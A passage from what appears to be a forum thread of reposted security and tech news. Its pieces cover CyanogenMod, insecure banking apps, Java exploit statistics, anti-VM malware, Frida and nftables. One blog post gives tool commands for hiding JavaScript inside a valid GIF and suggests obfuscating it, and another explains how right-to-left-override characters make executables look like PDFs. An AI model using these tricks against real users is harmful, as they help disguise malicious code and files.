some pretty extensive usability testing on it, because the big goal here is to get CM to as many people as possible. 
"We think that the whole walled garden approach is fine, but it's getting tired, and people want an alternative, and we've absolutely proven that. By having this installer, the current growth is just going to go crazy. It's just going to sky rocket." The team behind CyanogenModHe's not joking – after announcing the Cyanogen business, the brand new servers were brought to their knees from 38 million downloads in just one month. And the team was keen to point out that, while the installer is seen as the crucial first step to making CM more popular outside of hardcore Android users, it's only the beginning. "We need to make it really easy to install, and then we have to start building compelling reasons for people to install it," says Koush. "We need to make CyanogenMod really easy to install, and then we have to start building compelling reasons for people to install it." "Right now, the main reason people install it is because what is out there is just… not very good. And I don't want the reason that users come to us to be because the competition isn't good. I want the reason users come to us to be because we're awesome." To get to a point where users are being attracted to CM, the team is taking a few different approaches. One aspect is to build more useful services into the operating system, including network-based services. "We're contracting a really notable security researcher, Moxie Marlinspike, to build a secure messaging/iMessage product for us," says Koush. In with the new Another big change will be getting CM installed on phones as the default operating system, starting with a partnership with Oppo on the N1, a new flagship phone. "Oppo had given us support in the past, and when we were forming the company, I told them what was going on. For the global release of the N1, there's an officially supported version of CM, and there's also going to be a limited edition that will actually run CM by default," says Kondik. 
The Oppo N1 is the first of many official devices
"This is just the beginning of bigger things, really. We have the chance to do some experimentation and get everything in place to support something like this, and then next year we'll do something bigger. It's got to be done right, though.
"You can't just put some branding on a phone and sell it. You've got to provide something that you can't get elsewhere, especially if you want to make money off the thing. It's going to be important to have a really great platform, really great services. People aren't just going to shell out $800 for a device unless it's really giving them something that they can't get elsewhere."
One way to do this is to be on a device from a new company, and that's exactly what was announced at CES 2014. It was revealed that Cyanogen Inc was teaming up with a new mobile venture from China - OnePlus. The link? The founder of OnePlus is Pete Lau, a former VP of Oppo.
Mass appeal
Another opportunity is to use the team's knowledge, and the flexibility of CM's Android roots, to make something new that appeals to a different audience.
"CM is absolutely perfect for people who are technical, and everything is designed for people who are technical. We don't want to dumb it down, but we want to wrap some of that stuff in a prettier face. Sometime next year, we're planning on launching something quite a bit bigger that's geared more towards a broader market," says Kondik.
These plans help to explain why the team wanted to take the chance to push CM further by creating a business around it, but the decision understandably caused some concerns from the community, while some contributors wanted to know whether they would get paid a portion of the new business money for the work they put in. 
"I think some of the younger guys have this vision that Steve and I got written this seven million dollar check that went into our bank accounts," says Koush. "The money that we got is to build a business, so it's hiring people, paying them, building out an office, paying for the servers that have been donated for so long, paying for bandwidth… Paying for so many different things that it's scary looking through the transactions of our bank account."
Keeping competitive
The new company has also announced that some of the work it will do will be proprietary, leading to concerns over the future of the open-source project. Kondik understands these fears, but is fairly bullish that they're unfounded. "When you look at Android, it was done with a very specific goal in mind – to really screw up an industry that had gone so far down the proprietary software route that it was hopeless. And they totally succeeded. But now it's happening again, and we're hoping to be the answer to that," he says. "But you have to find a balance. The things that we won't be releasing are the things that give us a competitive edge. We won't release the source code for our installer. That would be crazy." "But we don't have any plans to close source any of the existing stuff," he says, definitively. "We're building on top of the open source project. We're not even maintaining a closed fork of CM internally. Anything that we need to do to support our own applications, we'll build the APIs [application programming interface] into the open source side and ship that."
Cid is CyanogenMod's slightly angry mascot
"Going forward, you're going to see two release branches. One is going to be business as usual, what we're releasing today. Then you're going to see a version that comes with extra stuff that we've done that we think is pretty awesome."
"We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out."
Some community members have also worried about the pressure on a business to make money, and how that will affect CM at large. "Right now, we're following the great Silicon Valley idea of 'get the users, and the money will come later'," says Kondik. "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. We're trying to build something important. There's too much time, and too many emotions from too many people involved to give it anything less than what it deserves."
Gaining ground
It's important for a project like CyanogenMod to remember the emotions and history that went into getting it to where it is today. When Kondik and Koush look back on the early days, they talk about the speed of growth and voracity of its contributors as though they're not quite sure it really happened.
The first official phone with CyanogenMod was the Oppo N1
"A few people had looked at different approaches to building on Android, but when I posted my version up, people seemed to really go crazy over it," says Kondik. "It was really awesome because of how quick people were to try it out and give feedback on what's broken and what could be better. So I kept at it for a few months and more people started using it, more people started submitting patches and wanted to work on it. Koush got involved when the first Motorola Droid hit the shelves, porting CM to it."
"For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue."
"I recall the first year there was maybe only a dozen guys, and then I disappeared for a year, and I came back and there were a hundred guys," says Koush. "And then a year later there were 500, and now there's 2,000. It's just crazy. It's exponential growth for contributors and for users."
But despite all the changes that come with moving from a purely contributor- and community-driven project to a well-funded business, the team promises that the feel of CyanogenMod won't change.
Mascot Cid replaced the popular Andy Bugdroid
"A lot of the guys who were on the open source project were going to their day jobs and then hacking on CM for a long time, including myself," says Kondik. "And now we just work on CM the whole time. But one thing that has not changed is working very, very late. Until 5 o'clock in the morning," he laughs. But is it the classic Silicon Valley startup with fun toys around the office? "We have a kegerator!" shouts Kondik, proudly. "And a really nice coffee machine," adds Koush. "I think we're all on the same page; the office is somewhere you want to come into and work, so we don't do cubes. We have a really nice setup and design." There is one thing that will change for CyanogenMod when it launches for a mainstream audience, though: the name. The team says that the company will still be called Cyanogen, and the open source project will keep its name, but for reaching a wider audience, the operating system will be called something new. "Yeah, it's changing…" Koush chuckles. "At some point. For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue." Sursa: CyanogenMod: from bedroom Android hack to million dollar mobile OS | News | TechRadar
-
[h=2]Hacking through image: GIF turn[/h] In one of my previous posts I described a way to hack through images. That time I showed how a valid BMP file could be a valid JS file as well, hiding JavaScript operations. Today it's time to describe how this attack works with a more common web file format: .GIF. Ange commented on my previous post, showing me his great work on the topic. I recommend having a look at his study (here). What follows is my quick 'n dirty Python implementation of the technique. The following HTML page loads a GIF file and a JavaScript file which happen to be the same file: 1.gif_malw.gif. Theoretically the file should be either a valid GIF file or a valid JavaScript file. Could it be a valid JavaScript and a valid image file at the same time? The answer should be NO. But by properly forging the file, the answer is YES, it is. Let's assume we have the following HTML page. Browsing this file you'll see this result: As you can see, both tags (img and script) are successfully executed. The Image tag is showing the black GIF file and the script tag is doing its great job by executing the JavaScript (alert('test')). How is it possible? The following image shows one detail of the dirty code that generates the beautiful GIF file. This is not magic at all. This is just my implementation of the GIF parsing bug many libraries have. The idea behind this Python code is to create a valid GIF header within \x2F\x2A (aka /*) and then close up the end of the image through a \x2A\x2F (aka */). Before injecting the payload you might inject a simple expression like "=1;" or the most commonly used "=a;" in order to use all the GIF block as a variable. The following image shows the first part of a forged GIF header to exploit this weakness (click to enlarge). After having injected the "padding" chars (in this case I call padding the '=a;' characters, which are useful to the JS interpreter) it's time to inject the real payload.
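The forging step described above can be sketched in a few lines of Python. This is only an illustration of the header trick, not the author's actual gif.py; the function name is mine:

```python
# Minimal sketch: the GIF logical screen width is set to 0x2A2F so that the
# two bytes right after "GIF89a" read as "/*" when parsed as JavaScript.
def forge_gif_js(gif_body: bytes, payload: str) -> bytes:
    header = b"GIF89a"    # parsed by a JS engine as the identifier GIF89a
    width = b"\x2f\x2a"   # width = 0x2A2F -> the bytes "/*" open a JS comment
    # height, flags and the whole image body all sit inside the comment...
    tail = b"*/=a;" + payload.encode()  # close the comment, absorb GIF89a
                                        # into an assignment, run the payload
    return header + width + gif_body + tail

polyglot = forge_gif_js(b"\x00" * 16, 'alert("test");')
assert polyglot.startswith(b"GIF89a/*")
assert polyglot.endswith(b'*/=a;alert("test");')
```

A real polyglot would of course keep the rest of the GIF structure valid so the image still renders; this sketch only shows how the comment delimiters bracket the binary data.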
The small script I've written automates this process, and you can run it in a really easy way: gif.py -i image.gif "alert(\"test\");" Don't forget, you might want to use obfuscators to better hide your JavaScript, like the following example: python gif.py -i 2.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);" If you want to check and/or download the code, click here. Enjoy your new hackish tool! Posted by Marco Ramilli Sursa: Marco Ramilli's Blog: Hacking through image: GIF turn
-
Just how secure is that mobile banking app? by Paul Ducklin on January 10, 2014 Ariel Sanchez, a researcher at security assessment company IOActive, recently published a fascinating report on the sort of security you can expect if you do your internet banking on an iPhone or iPad. The answer, sadly, seems to be, "Very little." You should head over to IOActive's blog to read the whole report. Sanchez details the results of a series of offline security tests conducted against 40 different iOS banking apps used by 60 different banks in about 20 different countries. Two problems stood out particularly:
70% of the apps offered no support at all for two-factor authentication.
40% of the apps accepted any SSL certificate for secure HTTP traffic.
Two-factor authentication
Banks are not alone in embracing and promoting two-factor authentication (2FA), also known as two-step verification. Sites like Facebook, Twitter, and Outlook.com all offer, and encourage, the practice, for example by sending you an SMS (text message) containing a one-time passcode every time you try to log in. The extra security this provides is obvious: crooks who steal your regular username and password are out of luck unless they also steal your mobile phone, without which they won't receive the additional codes they need to log in each time. You'd think that once a company had gone to the trouble of implementing 2FA for its customers, it would make it available to all its users. But many of the banks, just like the social networks and webmail services, have let their mobile apps lag behind. No support for 2FA, however, pales into insignificance when compared to the second problem: no HTTPS certificate validation.
The chain of trust
HTTPS certificates rely on a chain of trust, and validating that chain is important. Here's an example of an HTTPS connection, browsing to the "MySophos" download portal using Firefox: If we click on the [More information...]
button, we'll see that the chain of trust runs as shown below. GlobalSign vouches for the GlobalSign Extended Validation CA (Certificate Authority), which vouches for Sophos's claim to own sophos.com. And GlobalSign is trusted directly by Firefox itself, with that trust propagating downwards to Sophos's HTTPS certificate: This chain of trust stops anyone who feels like it from blindly tricking users with a certificate that says, "Hey, folks, this is sophos.com, trust us!" Anyone can create a certificate that makes such a claim, but unless they can also persuade a trusted CA to sign their home-made certificate, you'll see a warning that something fishy is going on when the imposter tries to mislead you: Digging further will explain the problem, namely that you have no reason to trust the certificate's claim that this really is a sophos.com server: You'll see a similar warning if you visit the imposter site from your iPhone or iPad, too: Again, digging further will reveal the untrusted certificate, and expose the deception, making it clear that you aren't actually dealing with sophos.com at all: Now remember that in IOActive's report, 40% of iOS banking apps simply didn't produce any warnings of that sort when faced with a fake certificate. You can feed those apps any certificate that claims to identify any website, and the app will blindly accept it. So, if the banking app is misdirected to a phishing site, for example while you are using an untrusted network such as a Wi-Fi hotspot, you simply won't know! In fact, it's not that you won't notice, but that you can't notice, and this is completely unacceptable. The silver lining, I suppose, is that 60% of the 40 apps that IOActive tested did notice bogus HTTPS certificates. The problem, though, is how you tell which camp your own bank's app falls into.
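The distinction between proper and skipped validation can be made concrete with Python's ssl module (a sketch of the two client configurations, not the banking apps' own Objective-C code):

```python
import ssl

# A properly configured client validates both the chain of trust and the
# hostname in the certificate.
ctx = ssl.create_default_context()
assert ctx.verify_mode == ssl.CERT_REQUIRED
assert ctx.check_hostname is True

# The 40% of apps in the report behave as if they had done this instead:
# any certificate (self-signed, expired, or for the wrong host) is accepted.
broken = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
broken.check_hostname = False   # must be disabled before dropping verify_mode
broken.verify_mode = ssl.CERT_NONE
```

With the first context, connecting to an imposter server raises an SSLCertVerificationError; with the second, the connection silently succeeds, which is exactly the "can't notice" failure described above.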
If you aren't sure, it's probably best just to stick to a full-size computer, and a properly patched browser, for your internet banking. Ironically, we wrote recently about a move by Dutch banks to set some minimum security standards that they will require customers to follow if they are to qualify for refunds of money stolen through phishing, carding or other forms of online fraud. Sounds as though there may be a spot of "Physician, heal thyself" needed here... Sursa: Just how secure is that mobile banking app? | Naked Security
-
Teen Reported to Police After Finding Security Hole in Website By Kim Zetter 01.08.14 7:44 PM Joshua Rogers. Photo: Simon Schluter. A teenager in Australia who thought he was doing a good deed by reporting a security vulnerability in a government website was reported to the police. Joshua Rogers, a 16-year-old in the state of Victoria, found a basic security hole that allowed him to access a database containing sensitive information for about 600,000 public transport users who made purchases through the Metlink web site run by the Transport Department. It was the primary site for information about train, tram and bus timetables. The database contained the full names, addresses, home and mobile phone numbers, email addresses, dates of birth, and a nine-digit extract of credit card numbers used at the site, according to The Age newspaper in Melbourne. Rogers says he contacted the site after Christmas to report the vulnerability but never got a response. After waiting two weeks, he contacted the newspaper to report the problem. When The Age called the Transportation Department for comment, it reported Rogers to the police. “It’s truly disappointing that a government agency has developed a website which has these sorts of flaws,” Phil Kernick, of cyber security consultancy CQR, told the paper. “So if this kid found it, he was probably not the first one. Someone else was probably able to find it too, which means that this information may already be out there.” The paper doesn’t say how Rogers accessed the database, but says he used a common vulnerability that exists in many web sites. It’s likely he used a SQL injection vulnerability, one of the most common ways to breach web sites and gain access to backend databases. The practice of punishing security researchers instead of thanking them for uncovering vulnerabilities is a tradition that has persisted for decades, despite extensive education about the important role such researchers play in securing systems. 
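For readers unfamiliar with the flaw class mentioned above, SQL injection can be sketched in a few lines (an illustrative in-memory table, nothing to do with the actual Metlink database):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, card TEXT)")
db.execute("INSERT INTO users VALUES ('alice', '424242424')")
db.execute("INSERT INTO users VALUES ('bob',   '515151515')")

# Vulnerable pattern: attacker-controlled input concatenated into the SQL.
evil = "nobody' OR '1'='1"
dumped = db.execute(
    "SELECT * FROM users WHERE name = '" + evil + "'").fetchall()
# The injected tautology matches every row, dumping the whole table.

# Safe pattern: a parameterized query treats the input as data, not SQL.
safe = db.execute("SELECT * FROM users WHERE name = ?", (evil,)).fetchall()
# No user is literally named "nobody' OR '1'='1", so nothing is returned.
```

The concatenated query becomes SELECT * FROM users WHERE name = 'nobody' OR '1'='1', which is why an attacker can walk away with an entire customer database through a single input field.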
The Age doesn’t say whether the police took any action against Rogers. But in 2011, Patrick Webster suffered a similar consequence after reporting a website vulnerability to First State Super, an Australian investment firm that managed his pension fund. The flaw allowed any account holder to access the online statements of other customers, thus exposing some 770,000 pension accounts — including those of police officers and politicians. Webster didn’t stop at simply uncovering the vulnerability, however. He wrote a script to download about 500 account statements to prove to First State that its account holders were at risk. First State responded by reporting him to police and demanding access to his computer to make sure he’d deleted all of the statements he had downloaded. In the U.S., hacker Andrew Auernheimer, aka “weev”, is serving a three-and-a-half-year sentence for identity theft and hacking after he and a friend discovered a hole in AT&T’s website that allowed anyone to obtain the email addresses and ICC-IDs of iPad users. The ICC-ID is a unique identifier that’s used to authenticate the SIM card in a customer’s iPad to AT&T’s network. Auernheimer and his friend discovered that the site would leak email addresses to anyone who provided it with a ICC-ID. So the two wrote a script to mimic the behavior of numerous iPads contacting the web site in order to harvest the email addresses of about 120,000 iPad users. They were charged with hacking and identity theft after reporting the information to a journalist at Gawker. Auernheimer is currently appealing his conviction. Update 1.9.14: Rogers confirmed to WIRED that the vulnerability he found was a SQL-injection vulnerability. He says the police have not contacted him and that he only learned he’d been reported to the police from the journalist who wrote the story for The Age. Sursa: Teen Reported to Police After Finding Security Hole in Website | Threat Level | Wired.com
-
[h=1]Java vulnerabilities keep breeding[/h]Dec 10, 2013 Denis Makrushin As many as 4.2 million attacks using Java exploits were repelled by our Automatic Exploit Prevention system between September 2012 and August 2013. This number indicates two points. The first point, of course, is the efficiency of our technology. The second point, unfortunately, is the fact that the quantity of attacks on Java has not been reduced but, on the contrary, has increased. Various Kaspersky Lab products have blocked about 14.1 million attacks exploiting Java vulnerabilities, which is one-third more than in 2011-2012. Unfortunately, Java has been and remains a headache for all those involved in information security. There are several reasons for that. Firstly, despite all of its flaws, Java is extremely popular with developers (according to some reports, there are about 9 million people worldwide who use it) since this language allows them to create cross-platform applications, as they all run in the Java Virtual Machine. For this reason, Java has spread enormously on all user platforms. Now, it is being employed by more than three billion devices worldwide. There is also another reason for its popularity: the development of Java started a long time ago, when there was no point in warning users about the prevalence of malware, let alone exploits, and so no perceived reason to spend time on security. It's no wonder then that last year 50% of attacks using exploits were targeted at Java. See the general dynamics of the number of attacks using exploits on the chart below: After a slight decline in mid-2012, it has been growing, while the other two "favorite" formats for intruders – PDF and Flash – have, on the contrary, been losing "popularity". One reason for the growing number of attacks is the fact that between September 2012 and August 2013 there were 160 new vulnerabilities discovered, i.e. twice as many as during the previous 12 months.
A recent Kaspersky Lab study on the evolution of Java exploits shows particularly strong growth (+21%) in the number of attacks from March until August 2013. 80% of the attacks occurred in 10 countries. This list is topped by the U.S., Russia, Germany and Italy. More than half of the attacks used exploits related to six well-known groups. In other words, we cannot say that attackers sought to diversify their tools. What do all these frightening numbers mean for business? First of all, you must understand that attackers deliberately search for Java vulnerabilities, so the use of applications written in this language is risky in itself. It does not mean that all of them should be removed immediately, but you must control them. Secondly, the statistics show that Java is not just the most frequently attacked software, but also one of the most reluctantly updated. On average, even a month and a half after the release of a corrected version, most users have not rushed to upgrade Java on their devices. And while system administrators can update Java centrally within a corporate infrastructure, user devices may be trickier. Unfortunately, exploits are a threat even in cases when users are well-versed in IT, aware of the dangers of malware and prompt to update software as soon as new versions are released. The point is that zero-day exploits for new vulnerabilities appear before a developer (in this case, Oracle) learns of the existence of these flaws. Hackers and developers are in a race, but the developers are constantly "catching up". And users are at risk the whole time between the moment of detection and the update's release. Ultimately, it is quite easy to expose oneself to an attack just by visiting a legitimate site with malicious code embedded by hackers. The surest way to protect against exploits is to use automated tools that block their activity in a preventive mode. Our Automatic Exploit Prevention technology is such a tool.
Despite the diversity of existing exploits, they all share several similarities. Besides being written for specific software, exploits have typical behavior patterns and carry out attacks in similar ways. This is why, for the most vulnerable software products and platforms (including Java), AEP enables a "presumption of guilt" mode: if such a program tries to download and run an executable file, that becomes a reason for additional checks, including tracking the source of the launch command and verifying the origin of the file being downloaded. If the file's characteristics are suspicious, its execution is automatically blocked. Here is a good example. In early January an exploit of Java's zero-day vulnerability CVE-2013-0422 was detected. The exploit proved to be extremely effective, with 83% of attacks succeeding. It even got to the point where cyber security experts from the US National Security Agency recommended that users should disable the Java plugin in web browsers to protect themselves against malicious attacks that used this previously unknown vulnerability. At the same time, the statistics of Kaspersky Security Network showed that the users of Kaspersky Lab's products with AEP technology successfully blocked the exploit on the basis of behavioral analysis even before the incident was made public. Sursa: Java vulnerabilities keep breeding | Blog on Kaspersky Lab business
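The "presumption of guilt" idea can be caricatured in a few lines of Python. This is purely illustrative: the process names and the trust flag are my assumptions, not Kaspersky's implementation:

```python
# Processes exploited often enough to warrant extra scrutiny (hypothetical list).
HIGH_RISK_PARENTS = {"java.exe", "javaw.exe", "jp2launcher.exe"}

def allow_launch(parent: str, origin_trusted: bool) -> bool:
    """Block executables spawned by high-risk parents from untrusted origins."""
    if parent.lower() in HIGH_RISK_PARENTS and not origin_trusted:
        return False  # suspicious: vulnerable parent plus unverified download
    return True

assert allow_launch("explorer.exe", origin_trusted=False)   # normal launch
assert not allow_launch("javaw.exe", origin_trusted=False)  # blocked
assert allow_launch("javaw.exe", origin_trusted=True)       # verified origin
```

The real technology of course weighs many more signals, but the asymmetry is the point: executables born from frequently exploited processes start out guilty until proven innocent.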
-
How public tools are used by malware developers, the antivm tale Alberto Ortega October 4, 2013 Malware authors are aware of new technologies and research made by the security community. This is palpable when they implement new vulnerability exploitation in their tools or even reuse source code belonging to public projects. We have discussed antivm and antisandbox analysis tricks seen in malware samples several times. Not long ago we came across a malware sample that had an interesting way to detect if it was being executed in a virtual environment / sandbox. You have probably heard about pafish or ScoopyNG, tools intended as proofs of concept on this topic. Sadly, it is only a matter of time before malware developers use that code to implement these techniques in new developments. Our malware sample behaved oddly when it was executed in a sandbox or virtual environment. Somehow, it was detecting that the environment was hostile to it; let's see how. It has four different executables embedded in it. One is a copy of pafish, another a copy of ScoopyNG, and the other two are malicious payloads. At run time it drops and executes the first two and tries to detect if it is running under a virtual machine or sandbox. If none of them detect anything, it drops the malicious payload and continues execution. We can see it in the malwr.com analysis. As you can see, the sandbox has been detected by pafish and the malware has started to create junk files in an infinite loop. Once we have located the routine, patching that jnz loc_4019B0 to disable the detection is an easy task. Once patched, the behavior in malwr.com is completely different. It has dropped more files and tried to resolve four different domains; after that, the box is rebooted. To be sure about what happened next, we can try to run it in our own malware analysis machine. After the box is rebooted, this is what we find. So we have a fake AV in the house!
The malicious payloads are a dropper that installs a Braviax variant. In this case, those public tools have helped us disable the detection. Releasing them to the public to train researchers on these topics is very positive; sadly, sometimes you can find this double-edged sword being used in the wild. Sursa: http://www.alienvault.com/open-threat-exchange/blog/how-public-tools-are-used-by-malware-developers-the-antivm-tale
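pafish bundles dozens of checks; one of the simplest families just looks for hypervisor-branded strings in hardware identifiers (BIOS vendor, disk model, and so on). A toy version of that idea, with an illustrative marker list that is not pafish's own:

```python
VM_MARKERS = ("vmware", "virtualbox", "vbox", "qemu", "xen", "parallels")

def looks_like_vm(hardware_strings) -> bool:
    """Return True if any identifier carries a hypervisor brand."""
    haystack = " ".join(s.lower() for s in hardware_strings)
    return any(marker in haystack for marker in VM_MARKERS)

assert looks_like_vm(["innotek GmbH", "VirtualBox"])
assert not looks_like_vm(["Dell Inc.", "OptiPlex 7040"])
```

A sample that embeds such checks only detonates on bare metal, which is exactly why the analysis above had to patch out the conditional jump before the payload would run in a sandbox.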
-
[h=1]BGPmon[/h]
BGPmon - BGP Hijack Monitoring

optional arguments:
-h, --help show this help message and exit
-b, --baseline Baseline records
-c, --check Check for any discrepancies in database
-e EMAIL, --email EMAIL Add Email to database
-ip IP, --ip IP Add IP to database

Saif El-Sherei

I. Introduction:
BGPmon monitors your BGP route for hijacking and sends email alerts whenever discrepancies are found between the baseline and the latest update records. It utilizes the "Team Cymru" IP-to-ASN tool using bulk queries. The BGP hijack monitor grabs the originating AS for a list of IPs saved in the database, and if the "-b" switch is supplied it will insert the results in the baseline table. If no switches are supplied, the results will be saved in the latest update tables. I would like to extend my special appreciation and thanks to the 'Team Cymru' group for providing such a service.

II. Installation:
Create database 'bgpmon' with user 'bgpmon' and a password. Make sure to update both bgp-db.py and bgpmon.py with the db name, db host, db user and db password:
update db details in 'bgpmon.py' line 26
update db details in 'bgp-db.py' line 5
Run the bgp-db.py script to create the required tables. Add IPs to be monitored with the '-ip' switch, and add emails to be alerted with the '-e' switch.

III. Usage:
Since this tool is made to run in the CLI, please note that all stdout is saved in the log file '/var/log/bgp_mon.log'. If you want to cancel this behaviour, just comment out line 21 in the 'bgpmon.py' script and you will see the output on your terminal.
./bgpmon.py -e Add Email to the emails table to be alerted.
./bgpmon.py -ip [IP] Add IP to the ips table to be monitored.
./bgpmon.py -b Grabs the origin AS for the IPs in the database and saves the results in the base_line tables.
./bgpmon.py Grabs the origin AS for the IPs in the database, saves the results in the latest_update table, and checks for differences between latest_update and base_line.
./bgpmon.py -c Manually checks the records with the MAX timestamp in the 'latest_update' table against the records in the 'base_line' table for each IP; if any difference is found, an email is sent to the saved addresses. Sursa: https://github.com/ssherei/BGPmon
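The Team Cymru bulk service answers with one pipe-separated line per IP. A small sketch of parsing such a verbose-mode line — the field layout follows the service's documented verbose format, but treat the exact example as illustrative rather than as BGPmon's own code:

```python
def parse_cymru_line(line: str) -> dict:
    """Split one verbose-mode answer line from whois.cymru.com into fields:
    AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name."""
    asn, ip, prefix, cc, registry, allocated, as_name = (
        f.strip() for f in line.split("|"))
    return {"asn": asn, "ip": ip, "prefix": prefix, "as_name": as_name}

rec = parse_cymru_line(
    "15169 | 8.8.8.8 | 8.8.8.0/24 | US | arin | 1992-12-01 | GOOGLE, US")
```

Comparing the "asn" (and ideally "prefix") field of each fresh answer against the baseline row for the same IP is the core of the hijack check: a changed origin AS is exactly the discrepancy worth an alert.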
-
[h=1]NFTables IPTables-Replacement Queued For Linux 3.13[/h] Posted by Michael Larabel in Linux Kernel on 19 October 2013 03:42 PM EDT NFTables is a new firewall subsystem / packet filtering engine for the Linux kernel that is poised to replace iptables. NFTables has been in development for several years, led by the upstream author of Netfilter, and this new nftables system is now set to be merged into the Linux 3.13 kernel. NFTables aims to replace iptables by offering a simpler kernel ABI, reduced code duplication, improved error reporting, and more efficient handling of filtering rules. Beyond iptables, it also replaces the ip6tables, arptables, and ebtables frameworks, though nftables does offer a compatibility layer for iptables rules. For those into networking and wanting to learn more about NFTables, visit its Netfilter.org project page. Earlier this week a pull request was sent in for pulling nf_tables into the next Linux kernel release through the net-next branch. The pull request was accepted and is now living in the net-next Git repository for Linux 3.13. IPTables won't die off in Linux 3.13 as there's still work ahead for NFTables, but those wanting to try out the new code when it's mainlined can find this how-to guide. Sursa: [Phoronix] NFTables IPTables-Replacement Queued For Linux 3.13
-
How's My SSL How's My SSL? is a cute little website that tells you how secure your TLS client is: TLS clients just like the browser you're reading this with. How's My SSL? was originally made to help a web server developer learn what real-world TLS clients were capable of. It's been expanded to give developers and the very technically-savvy a quick and easy way to learn more about the TLS tools they use. It's also meant to impel developers to modernize and improve their TLS stacks. Many security problems come from engineers simply not knowing what worries to have. How's My SSL? is a demonstration of what those TLS client worries should be. How's My SSL? chooses topics important to today's security environment and analyzes clients in that context. It will never be a complete audit, but it can hit the high notes. Over time, How's My SSL? will change to live in an ever more difficult security environment. It will be kept up by people who care. Link: https://www.howsmyssl.com/
-
Inject JavaScript to explore native apps Inject JavaScript to explore native apps on Windows, Mac, Linux and iOS. [h=2]Scriptable[/h] Your own scripts get injected into black box processes to execute custom debugging logic. Hook any function, spy on crypto APIs or trace private application code, no source code needed! [h=2]Stalking[/h] Stealthy code tracing without relying on software or hardware breakpoints. Think DTrace in user-space, based on dynamic recompilation, like DynamoRIO and PIN. [h=2]Portable[/h] Works on Windows, Mac, Linux, and iOS. Grab a Python package from PyPI or use Frida through its .NET binding, browser plugin or C API. [h=4]Get up and running in seconds.[/h] ~ $ sudo easy_install frida ~ $ frida-trace -i 'recv*' Skype recvfrom: Auto-generated handler: …/recvfrom.js Started tracing 21 functions. 1442 ms recvfrom() # Live-edit recvfrom.js and watch the magic! 5374 ms recvfrom(socket=67, buffer=0x252a618, length=65536, flags=0, address=0xb0420bd8, address_len=16) Sursa: Frida
-
The RTLO method January 9, 2014 | By Pieter Arntz After my post about extensions, I received some requests to deal with another method of pretending to be a different type of file. If you have not read that article yet, it will prove helpful to do that first in order to better understand this post.
What is RTLO (aka RLO)?
The method called RTLO, or RLO, uses the mechanism built into Windows to deal with languages that are written from right to left, the "Right to left override". Let's say you want to use a right-to-left written language, like Hebrew or Arabic, on a site combined with a left-to-right written language like English or French. In this case, you would want bidirectional script support. Bidirectional script support is the capability of a computer system to correctly display bi-directional text. In HTML we can use Unicode right-to-left marks and left-to-right marks to override the HTML bidirectional algorithm when it produces undesirable results:
left-to-right mark: &lrm; or &#x200E; (U+200E)
right-to-left mark: &rlm; or &#x200F; (U+200F)
How is RTLO being abused by malware writers?
On systems that support Unicode filenames, RTLO can be used to spoof fake extensions. To do this we need a hidden Unicode character in the file name that will reverse the order of the characters that follow it. Look for example at this file, a copy of HijackThis.exe, that I renamed using RTLO: The last seven characters in the file name are displayed backwards because I inserted the RTLO character before those seven characters. As discussed in the previous article, assigning a matching icon to a file is a triviality for a programmer. So here we have an executable file that seems to have the PDF extension. Ironically, you will see straight through this deception if you are still running XP, since it does not support these file names: The square symbol shows us where the Unicode RTLO character is placed.
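The renaming trick, and a cheap way to flag it, can both be shown in a few lines of Python (the filenames are invented for illustration):

```python
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE: reverses the display of what follows

# On disk this stays an .exe; in RTL-aware file managers the tail renders
# reversed, so the name appears to end in ".pdf" instead.
spoofed = "Invoice_" + RLO + "fdp.exe"
assert spoofed.endswith(".exe")  # the real extension never changed

def has_rtlo(name: str) -> bool:
    """Cheap detector: flag any bidi override character in a filename."""
    return any(ch in name for ch in ("\u202d", "\u202e"))

assert has_rtlo(spoofed)
assert not has_rtlo("HijackThis.exe")
```

Note that only the rendering is affected: Windows still resolves the file type from the logical, unreversed name, which is why double-clicking the "PDF" runs an executable.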
One way to catch these fakes on more modern versions of Windows is to set the "Change your view" ruler to "Content". Set this way, you can see that the files are applications and not a PDF or jpg. This may be a good idea for your "Download" folder(s), so you can check if you have downloaded what you expected to get.
Is the RTLO method actively being used?
The technique has been known for quite a while and is starting to resurface. It is not only being used for filenames, by the way. A malware known as Sirefef (which Malwarebytes Anti-Malware detects as Trojan.Agent.EC) uses the RTLO method to trick users into thinking that the entries it puts into the infected machine's registry are legitimate ones, belonging to Google update.
Does this have any effect on the detection of these files?
No. Detection of a malicious file is never done by filename alone. So your AV and Malwarebytes Anti-Malware will still recognize these files if they were added to their detection, no matter what they are called or how they are written.
Summary: RTLO is used to fake extensions by writing part of the filename or other descriptions back to front. Although the detection by your AV or Malwarebytes Anti-Malware is not altered in any way, this trick can deceive users at first glance.
Sources:
http://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
Sirefef Malware Found Using Unicode Right-to-Left Override Technique | Threatpost
H34: Using a Unicode right-to-left mark (RLM) or left-to-right mark (LRM) to mix text direction inline | Techniques for WCAG 2.0
Sursa: The RTLO method | Malwarebytes Unpacked
-
Exploit Delivery Networks

Posted on January 9, 2014 by darryl

Exploit packs are normally set up on a hacker-controlled server. Compromised websites or malicious email links lead unsuspecting users to the drive-by landing page on the server. While this keeps the main control panel, renter's panel, crypter, statistics, etc. all in one place, it's vulnerable to a take-down resulting in a major disruption and a loss of statistical data, among other things.

We might be seeing the beginning of a new trend where distributed, self-contained exploit packs are installed on multiple compromised websites. A back-end server pushes out updates to and retrieves statistics from these websites. Take-downs of these compromised websites hosting the exploit packs don't cause a major disruption anymore; the hackers just compromise other websites and quickly build it back up. This is basically a content delivery network but for exploits: an "Exploit Delivery Network", if you will. RedKit is a prime example (you can read about it here).

Another exploit pack was recently revealed which operates in a similar manner. Special thanks to a colleague of mine who provided me with intel and permission to write about this. Also thanks to a forum administrator who provided me with the files after his site was compromised.

Ramayana Exploit Pack

